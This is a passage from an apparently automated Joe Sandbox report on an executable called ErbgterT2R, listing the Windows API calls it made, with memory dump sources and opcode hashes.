                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                                            • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                                            • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                                            • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
APIs
• SysAllocString.OLEAUT32(?), ref: 0040ED05
• _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
Similarity
• API ID: AllocExceptionStringThrow
• String ID:
• API String ID: 3773818493-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0040E745
• LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
  • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
• CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
APIs
• WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• _beginthreadex.MSVCRT ref: 00406552
  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
Similarity
• API ID: ErrorLast_beginthreadex
• String ID:
• API String ID: 4034172046-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                            • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                                            • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                            • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                                            APIs
                                                                                            • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTime
                                                                                            • String ID:
                                                                                            • API String ID: 1425588814-0
                                                                                            • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                            • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                                            • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                            • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: memmove
                                                                                            • String ID:
                                                                                            • API String ID: 2162964266-0
                                                                                            • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                                            • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                                                            • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                                            • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                                                            APIs
                                                                                            • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionThrow
                                                                                            • String ID:
                                                                                            • API String ID: 432778473-0
                                                                                            • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                                            • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                                                            • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                                            • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                            • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                                            • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                            • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                                            • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                                            • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                                            • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                            • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                            • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                            • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                            • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                                            • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                            • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(000000D0), ref: 0041138D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                                                                            • Instruction ID: d5b8b2b556814232dc2945b8f7e5995fed121ff751d048b21687cc00dda573f5
                                                                                            • Opcode Fuzzy Hash: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                                                                            • Instruction Fuzzy Hash: B4B0123438914504FE5413B208013FB01800F40303F10087B5B02E4DF9FD0884805139
                                                                                            APIs
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                            • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                            • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                            • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09

APIs
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
• Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
• Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
• Instruction Fuzzy Hash:

APIs
• _wtol.MSVCRT ref: 004034E5
• SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
• ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
• _wtol.MSVCRT ref: 0040367F
• CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
• ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
• ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
• String ID: .lnk
• API String ID: 408529070-24824748
• Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
• Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
• Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
• Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18

APIs
• GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
• wsprintfW.USER32 ref: 00401FFD
• GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
• GetLastError.KERNEL32 ref: 00402017
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
• GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
• GetLastError.KERNEL32 ref: 0040204C
• lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
• ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
• SetLastError.KERNEL32(00000000), ref: 00402098
• lstrlenA.KERNEL32(00413FD0), ref: 004020CC
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
• GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
• _wtol.MSVCRT ref: 0040212A
• MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
• String ID: 7zSfxString%d$XpA$\3A
• API String ID: 2117570002-3108448011
• Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
• Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
• Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
• Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
• FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
• FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
• LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
• LockResource.KERNEL32(00000000), ref: 00401C41
• LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
• GetProcAddress.KERNEL32(00000000), ref: 00401C76
• wsprintfW.USER32 ref: 00401C95
• LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
• GetProcAddress.KERNEL32(00000000), ref: 00401CAD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
• String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
• API String ID: 2639302590-365843014
• Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
• Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
• Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
• Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8

APIs
• wvsprintfW.USER32(?,00000000,?), ref: 0040779A
• GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
• FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
• FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
• lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
• lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
• ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
• lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
